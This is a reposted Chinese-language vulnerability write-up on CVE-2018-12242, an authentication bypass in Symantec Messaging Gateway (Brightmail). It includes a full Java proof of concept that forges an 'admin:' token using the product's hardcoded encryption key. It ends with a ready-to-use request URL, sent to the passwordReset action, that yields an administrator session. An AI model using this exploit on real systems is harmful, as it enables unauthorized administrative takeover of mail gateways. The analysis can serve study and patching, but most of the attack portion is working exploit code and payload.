您好,登錄后才能下訂單哦!
怎么實現CVE-2018-12242漏洞分析,相信很多沒有經驗的人對此束手無策,為此本文總結了問題出現的原因和解決方法,通過這篇文章希望你能解決這個問題。
CVE-2018-12242
手里有symantec的源碼 于是立刻就分析了 存在手里一直沒動
先上poc
import java.security.SecureRandom; import javax.crypto.Cipher; import javax.crypto.SecretKey; import javax.crypto.SecretKeyFactory; import javax.crypto.spec.PBEKeySpec; import javax.crypto.spec.PBEParameterSpec; import sun.misc.BASE64Encoder; public class Test{ public static void main(String args[]){ try{ //System.out.print(123); byte[] salt = new byte[8]; SecureRandom random = SecureRandom.getInstance("SHA1PRNG"); random.nextBytes(salt); PBEKeySpec keySpec = new PBEKeySpec("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ,./<>?;':\"\\{}`~!@#$%^&*()_+-=".toCharArray()); SecretKeyFactory keyFactory = SecretKeyFactory.getInstance("PBEWithMD5AndDES"); SecretKey key = keyFactory.generateSecret(keySpec); PBEParameterSpec paramSpec = new PBEParameterSpec(salt, 1000); Cipher cipher = Cipher.getInstance("PBEWithMD5AndDES"); cipher.init(1, key, paramSpec); //byte[] salt; BASE64Encoder encoder = new BASE64Encoder(); String saltString = encoder.encode(salt); String text = "admin:"; byte[] ciphertext = cipher.doFinal(text.getBytes()); String ciphertextString = encoder.encode(ciphertext); System.out.print(saltString + ciphertextString); }catch (Exception e){ System.out.print(e); } } }
核心還是在加密解密這塊
加密算法一直是固定的
但是FIPS186PRNG這個算法太古老了
只能拿SHA1PRNG代替
接下來分析一波漏洞觸發點
token = BrightmailDecrypt.decrypt(token);
接收到token用公共的解密方法解密
解密之后按 “ : ”
分割 前面為username 后面為 passwordhash
然后按username做sql查詢
然后調用getAdministratorUserByName方法
GetSQLAdministratorUserByName生成sql語句
然后查詢
接著對比
如果user為空會拋出一個不存在該用戶的異常
如果passwordhash與查詢到的passwordhash不一致也會拋出異常
那么passwordhash是什么呢
在開啟重置密碼選項后 該字段為空。。。
然后創建一個admin session的正常操作….
那么最終payload為
/brightmail/action2.do?method=passwordReset&authorization=S9m%2bdmCBN8k%3dfot%2fxYG299k%3d
看完上述內容,你們掌握怎么實現CVE-2018-12242漏洞分析的方法了嗎?如果還想學到更多技能或想了解更多相關內容,歡迎關注億速云行業資訊頻道,感謝各位的閱讀!
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。